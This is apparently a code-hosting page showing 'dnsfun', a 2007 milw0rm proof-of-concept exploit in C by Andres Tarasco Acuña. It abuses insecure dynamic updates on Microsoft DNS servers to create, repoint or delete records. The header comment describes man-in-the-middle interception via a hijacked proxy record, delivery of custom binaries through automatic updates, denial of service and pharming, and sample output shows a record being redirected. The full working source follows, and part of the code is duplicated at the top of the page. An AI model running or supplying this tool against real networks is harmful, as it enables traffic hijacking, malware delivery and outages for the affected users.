} else {
|
||||
printf("[-] Unknown Options\n");
|
||||
return(-1);
|
||||
}
|
||||
} else {
|
||||
printf("[-] Error Calling DnsAcquireContextHandle\n");
|
||||
}
|
||||
return (1);
|
||||
}
|
||||
|
||||
/****************************************************************************/
|
||||
void usage(char *argv[]) {
|
||||
printf(" Usage:\n");
|
||||
printf("\t%s\t -[s]d|c|q[u] <options>\n",argv[0]);
|
||||
printf(" Details:\n");
|
||||
printf("\t%s\t -s ip (dns Server (optional))\n",argv[0]);
|
||||
printf("\t%s\t -d fqdn (Delete dns record)\n",argv[0]);
|
||||
printf("\t%s\t -q fqdn (Query dns record)\n",argv[0]);
|
||||
printf("\t%s\t -c[a|c] ip (Create A or CName record (default A))\n",argv[0]);
|
||||
printf("\t%s\t -u ip|fqdn (Update dns record (requires -q or -c))\n",argv[0]);
|
||||
printf("\n Examples:\n");
|
||||
printf("\t%s -s 10.0.0.1 -q proxy.mydomain.com -u 5.1.4.77 (Updates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -cc www.atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)\n",argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
/****************************************************************************/
|
||||
|
||||
// milw0rm.com [2007-03-22]
|
||||
/*
|
||||
Exploiting Microsoft DNS Dynamic Updates for Fun and profit
|
||||
Andres Tarasco Acuña - (c) 2007
|
||||
Url: http://www.514.es
|
||||
|
||||
|
||||
By default, most Microsoft DNS servers integrated with active directory allow
|
||||
insecure dynamic updates for dns records.
|
||||
This feature allows remote users to create, change and delete DNS records.
|
||||
There are several attack scenarios:
|
||||
|
||||
+ MITM attacks: Changing dns records for the network proxy and relay HTTP queries.
|
||||
This attack vector is the most reliable and also allows us to exploit automatic
|
||||
updates for most Windows software, by deploying custom binaries to the client.
|
||||
|
||||
+ Denial of service: by deleting / changing critical dns records
|
||||
|
||||
+ Pharming: like mitm attacks, poisoning several dns records.
|
||||
|
||||
dnsfun exploits that weak configuration and allows remote users to modify dns records.
|
||||
Here are some examples of what can be done. Example:
|
||||
|
||||
|
||||
D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
|
||||
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:
|
||||
|
||||
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
|
||||
Microsoft Dynamic DNS Updates - Proof of Concept
|
||||
http://www.514.es - (c) 2007 Andres Tarasco Acuña
|
||||
|
||||
[+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
|
||||
[+] Host proxy.mydomain resolved as 192.168.1.200
|
||||
[+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
|
||||
[+] Trying Nonsecure Dynamic Update...
|
||||
[?] Host Updated. Checking...(0)
|
||||
[+] Host proxy.mydomain resolved as 66.6.66.6
|
||||
|
||||
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com -u www.514.es
|
||||
Microsoft Dynamic DNS Updates - Proof of Concept
|
||||
http://www.514.es - (c) 2007 Andres Tarasco Acuña
|
||||
|
||||
[+] Gathering Credentials..
|
||||
[+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
|
||||
[+] Host Created. Rechecking Record...
|
||||
[+] Host atarasco.mydomain.com resolved as CNAME www.514.es
|
||||
|
||||
This isn't a new vulnerability but AFAIK those attack vectors were never exploited.
|
||||
|
||||
Check the usage function for more information
|
||||
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <winsock2.h>
|
||||
#include <Windns.h>
|
||||
#pragma comment(lib,"Dnsapi.lib")
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
char TargetDnsServer[256]=""; // -s
|
||||
char TargetDnsRecord[256]=""; // -q
|
||||
char NewIpAddress[256]=""; // -i
|
||||
char DeleteDnsRecord[256]=""; //-d
|
||||
char CreateDnsRecord[256]="";
|
||||
|
||||
WORD CreationType=DNS_TYPE_A;
|
||||
|
||||
#define DELETERECORD (DeleteDnsRecord[0]!='\0')
|
||||
#define UPDATERECORD ( (TargetDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
|
||||
#define CREATERECORD ( (CreateDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
|
||||
#define QUERYRECORD (TargetDnsRecord[0]!='\0')
|
||||
#define _DBG_
|
||||
#undef _DBG_
|
||||
|
||||
void usage(char *argv[]);
|
||||
|
||||
|
||||
DNS_RECORDA *DnsQueryA(char *name,IP4_ARRAY *servers)
|
||||
{
|
||||
|
||||
DNS_STATUS status;
|
||||
WORD type= DNS_TYPE_ANY;
|
||||
DWORD fOptions=DNS_QUERY_BYPASS_CACHE | DNS_QUERY_NO_LOCAL_NAME |DNS_QUERY_NO_HOSTS_FILE | DNS_QUERY_NO_NETBT | DNS_QUERY_TREAT_AS_FQDN;
|
||||
PVOID* reserved=NULL;
|
||||
DNS_RECORDA *records=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
|
||||
DNS_RECORDA *result;
|
||||
IN_ADDR ipaddr;
|
||||
int i;
|
||||
int count=0;
|
||||
|
||||
if (!name) {
|
||||
return (NULL);
|
||||
} else {
|
||||
memset(records,'\0',sizeof(DNS_RECORDA));
|
||||
status = DnsQuery_A( name, //PCWSTR pszName,
|
||||
type, //WORD wType,
|
||||
fOptions, //DWORD fOptions,
|
||||
servers, //PIP4_ARRAY aipServers,
|
||||
(DNS_RECORDA**)&records, //PDNS_RECORD* ppQueryResultsSet,
|
||||
reserved ); //PVOID* pReserved
|
||||
|
||||
if (status == ERROR_SUCCESS)
|
||||
{
|
||||
fflush(stdout);
|
||||
result=records;
|
||||
do {
|
||||
#ifdef _DBG_
|
||||
printf("[+] Record %i---\n",count);
|
||||
count++;
|
||||
printf("[+] DNS wDataLength %i\n",result->wDataLength);
|
||||
printf("[+] DNS Flags DW: %x\n",result->Flags.DW);
|
||||
printf("[+] DNS Flags S.Section: %x\n",result->Flags.S.Section);
|
||||
printf("[+] DNS Flags S.Delete: %x\n",result->Flags.S.Delete);
|
||||
printf("[+] DNS Flags S.CharSet: %x\n",result->Flags.S.CharSet);
|
||||
printf("[+] DNS Flags S.Unused: %x\n",result->Flags.S.Unused);
|
||||
printf("[+] DNS Flags S.Reserved: %x\n",result->Flags.S.Reserved);
|
||||
#endif
|
||||
switch (result->wType) {
|
||||
case DNS_TYPE_A:
|
||||
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
|
||||
printf("[+] Host %s resolved as %s\n", result->pName,inet_ntoa(ipaddr));
|
||||
break;
|
||||
case DNS_TYPE_NS:
|
||||
printf("[+] Domain %s Dns Servers: %s\n",result->pName,result->Data.Ns.pNameHost);
|
||||
break;
|
||||
case DNS_TYPE_CNAME:
|
||||
printf("[+] Host %s resolved as CNAME %s\n", result->pName,result->Data.Cname.pNameHost);
|
||||
//DnsQueryA(result->Data.Cname.pNameHost,servers);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_SOA:
|
||||
printf("[+] SOA Information: PrimaryServer: %s\n",result->Data.Soa.pNamePrimaryServer);
|
||||
printf("[+] SOA Information: Administrator: %s\n",result->Data.Soa.pNameAdministrator);
|
||||
printf("[+] SOA Information: SerialNo %x - Refresh %i - retry %i - Expire %i - DefaultTld %i\n",
|
||||
result->Data.Soa.dwSerialNo,
|
||||
result->Data.Soa.dwRefresh,
|
||||
result->Data.Soa.dwRetry,
|
||||
result->Data.Soa.dwExpire,
|
||||
result->Data.Soa.dwDefaultTtl);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_MX:
|
||||
printf("[+] %s MX Server resolved as %s (Preference %i)\n", result->pName,result->Data.Mx.pNameExchange, result->Data.Mx.wPreference);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_TEXT:
|
||||
printf("[+] Text: %i bytes\n",result->Data.Txt.dwStringCount); //:?
|
||||
break;
|
||||
|
||||
case DNS_TYPE_SRV:
|
||||
printf("[+] SRV Record. NameTarget %s ",result->Data.Srv.pNameTarget);
|
||||
printf("(Priority %i - Port %i - Weigth: %i)\n",result->Data.Srv.wPriority,result->Data.Srv.wPort,result->Data.Srv.wWeight);
|
||||
//printf("[+] Resource Pad %i \n",result->Data.Srv.Pad);
|
||||
break;
|
||||
|
||||
default:
|
||||
printf("[-] DnsQuery returned unknown wtype %x\n",result->wType);
|
||||
break;
|
||||
}
|
||||
result=result->pNext;
|
||||
} while (result!=NULL);
|
||||
} else {
|
||||
if (status==9003) printf("[-] Record not found\n");
|
||||
else printf("[-] Query Error: %i - %i\n",status,GetLastError());
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
return records;
|
||||
}
|
||||
/***********************************************************************************************/
|
||||
int main(int argc, char *argv[]) {
|
||||
|
||||
HANDLE creds;
|
||||
DNS_RECORDA *result;
|
||||
DNS_STATUS status;
|
||||
|
||||
HANDLE ContextHandle;
|
||||
DWORD Options=DNS_UPDATE_SECURITY_ON;
|
||||
PVOID pReserved=NULL;
|
||||
IN_ADDR ipaddr;
|
||||
IP4_ARRAY *servers=NULL;
|
||||
SEC_WINNT_AUTH_IDENTITY_A *Credentials=NULL;
|
||||
WORD i;
|
||||
|
||||
printf(" Microsoft Dynamic DNS Updates - Proof of Concept\n");
|
||||
printf(" http://www.514.es - (c) 2007 Andres Tarasco Acuña\n\n");
|
||||
if (argc==1) usage(argv);
|
||||
|
||||
//Init Credentials Struct
|
||||
Credentials = (SEC_WINNT_AUTH_IDENTITY_A *)malloc(sizeof(SEC_WINNT_AUTH_IDENTITY_A));
|
||||
memset(Credentials,'\0',sizeof(SEC_WINNT_AUTH_IDENTITY_A));
|
||||
Credentials->Flags=SEC_WINNT_AUTH_IDENTITY_ANSI;
|
||||
for(i=1;i<argc;i++) {
|
||||
if ( (argv[i][0]=='-') ) {
|
||||
switch (argv[i][1]) {
|
||||
case 's':
|
||||
case 'S':
|
||||
strcpy(TargetDnsServer,argv[i+1]);
|
||||
servers=(PIP4_ARRAY)malloc(sizeof(IP4_ARRAY));
|
||||
servers->AddrCount=1;
|
||||
servers->AddrArray[0]=inet_addr(TargetDnsServer);
|
||||
break;
|
||||
case 'D':
|
||||
case 'd':
|
||||
strcpy(DeleteDnsRecord,argv[i+1]);
|
||||
break;
|
||||
case 'q':
|
||||
case 'Q':
|
||||
strcpy(TargetDnsRecord,argv[i+1]);
|
||||
break;
|
||||
case 'u':
|
||||
case 'U':
|
||||
strcpy(NewIpAddress,argv[i+1]);
|
||||
break;
|
||||
case 'c':
|
||||
case 'C':
|
||||
strcpy(CreateDnsRecord,argv[i+1]);
|
||||
if (NewIpAddress[0]=='\0') strcpy(NewIpAddress,"127.0.0.1");
|
||||
if (argv[i][2]!='\0') {
|
||||
switch (argv[i][2]) {
|
||||
case 'c': CreationType=DNS_TYPE_CNAME;
|
||||
break;
|
||||
case 'a': CreationType=DNS_TYPE_A;
|
||||
break;
|
||||
}
|
||||
}
|
||||
break;
|
||||
/*
|
||||
case 'f':
|
||||
CreateThread( NULL,0,HttpRelayToProxy,(LPVOID) &i,0,&dwThreadId);
|
||||
break;
|
||||
case 'au': //Uauthorization serName
|
||||
Credentials->User=argv[i+1]; Credentials->UserLength=strlen(argv[i+1]); break;
|
||||
case 'ap':
|
||||
Credentials->Password=argv[i+1];Credentials->PasswordLength=strlen(argv[i+1]); break;
|
||||
case 'ad':
|
||||
Credentials->Domain=argv[i+1]; Credentials->DomainLength=strlen(argv[i+1]); break;
|
||||
*/
|
||||
default:
|
||||
printf("[-] Invalid argument: %s\n",argv[i]);
|
||||
usage(argv);
|
||||
break;
|
||||
}
|
||||
i++;
|
||||
} else usage(argv);
|
||||
}
|
||||
|
||||
printf("[+] Gathering Credentials..\n");
|
||||
//http://msdn2.microsoft.com/en-us/library/ms682007.aspx
|
||||
if (Credentials->UserLength==0) {
|
||||
status=DnsAcquireContextHandle(FALSE,NULL,&ContextHandle); //Context with default Credentials
|
||||
} else {
|
||||
status=DnsAcquireContextHandle(FALSE,Credentials,&ContextHandle); //Context with Custom Credentials
|
||||
}
|
||||
|
||||
if (status == ERROR_SUCCESS) {
|
||||
if (CREATERECORD) {
|
||||
|
||||
result=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
|
||||
memset(result,'\0',sizeof(DNS_RECORDA));
|
||||
result->wType=CreationType; //DNS_TYPE_A by default
|
||||
if (CreationType==DNS_TYPE_CNAME) {
|
||||
printf("[+] Creating DNS CName Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
|
||||
result->Data.Cname.pNameHost=NewIpAddress;
|
||||
} else {
|
||||
printf("[+] Creating DNS A Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
|
||||
result->Data.A.IpAddress=inet_addr(NewIpAddress);
|
||||
}
|
||||
result->pName=CreateDnsRecord;
|
||||
result->wDataLength=4;
|
||||
result->Flags.S.Section=1;
|
||||
result->Flags.S.CharSet=DnsCharSetAnsi;
|
||||
result->pNext=NULL;
|
||||
|
||||
status=DnsModifyRecordsInSet_A(result, //add record
|
||||
NULL, //delete record
|
||||
Options,
|
||||
ContextHandle,
|
||||
servers,
|
||||
NULL);
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Created. Rechecking Record...\n");
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(CreateDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to create %s (%i)\n",CreateDnsRecord,status);
|
||||
}
|
||||
} else if (DELETERECORD) {
|
||||
printf("[+] Trying to resolve Host: %s before deleting\n",DeleteDnsRecord);
|
||||
result=DnsQueryA(DeleteDnsRecord,servers);
|
||||
if (result!=NULL) {
|
||||
printf("[+] Trying to Delete Record. Are You Sure? (Y/N)...");
|
||||
i=getchar(); if (i!='y') return(-1);
|
||||
printf("[+] Deleting record %s\n",DeleteDnsRecord);
|
||||
status=DnsModifyRecordsInSet_A(NULL, //add record
|
||||
result, //delete record
|
||||
Options,
|
||||
ContextHandle,
|
||||
servers,
|
||||
NULL);
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Deleted. Rechecking Record %s...\n",DeleteDnsRecord);
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(DeleteDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to Delete %s\n",DeleteDnsRecord);
|
||||
}
|
||||
} else {
|
||||
printf("[-] Host %s not found\n",DeleteDnsRecord);
|
||||
}
|
||||
|
||||
} else if (UPDATERECORD) {
|
||||
// exit(1);
|
||||
printf("[+] Trying to resolve Host: %s before updating\n",TargetDnsRecord);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
if (result->wType==DNS_TYPE_A ) {
|
||||
printf("[+] Trying to update record. Are You Sure? (Y/N)...");
|
||||
i=getchar(); if (i!='y') return(-1);
|
||||
result->Data.A.IpAddress=inet_addr(NewIpAddress);//Modify Dns record
|
||||
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
|
||||
printf("[+] Trying to set ip address of the host %s to %s \n", TargetDnsRecord,NewIpAddress);//inet_ntoa(ipaddr));
|
||||
printf("[+] Trying to Modify Record...\n");
|
||||
status=DnsReplaceRecordSetA(result,
|
||||
Options, //Attempts nonsecure dynamic update. If refused, then attempts secure dynamic update.
|
||||
ContextHandle,
|
||||
servers,//pServerList,
|
||||
NULL);//pReserved
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Updated. Rechecking Record...\n");
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to Delete %s\n",TargetDnsRecord);
|
||||
}
|
||||
|
||||
} else {
|
||||
printf("[-] Unable to Update Record (Type %x)\n",result->wType);
|
||||
}
|
||||
} else if (QUERYRECORD) {
|
||||
printf("[+] Query Information for host %s...\n",TargetDnsRecord);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
} else {
|
||||
printf("[-] Unknown Options\n");
|
||||
return(-1);
|
||||
}
|
||||
} else {
|
||||
printf("[-] Error Calling DnsAcquireContextHandle\n");
|
||||
}
|
||||
return (1);
|
||||
}
|
||||
|
||||
/****************************************************************************/
|
||||
void usage(char *argv[]) {
|
||||
printf(" Usage:\n");
|
||||
printf("\t%s\t -[s]d|c|q[u] <options>\n",argv[0]);
|
||||
printf(" Details:\n");
|
||||
printf("\t%s\t -s ip (dns Server (optional))\n",argv[0]);
|
||||
printf("\t%s\t -d fqdn (Delete dns record)\n",argv[0]);
|
||||
printf("\t%s\t -q fqdn (Query dns record)\n",argv[0]);
|
||||
printf("\t%s\t -c[a|c] ip (Create A or CName record (default A))\n",argv[0]);
|
||||
printf("\t%s\t -u ip|fqdn (Update dns record (requires -q or -c))\n",argv[0]);
|
||||
printf("\n Examples:\n");
|
||||
printf("\t%s -s 10.0.0.1 -q proxy.mydomain.com -u 5.1.4.77 (Updates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -cc www.atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n",argv[0]);
|
||||
printf("\t%s -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)\n",argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
/****************************************************************************/
|
||||
|
||||
// milw0rm.com [2007-03-22]
|
||||
|
|
Loading…
Add table
Reference in a new issue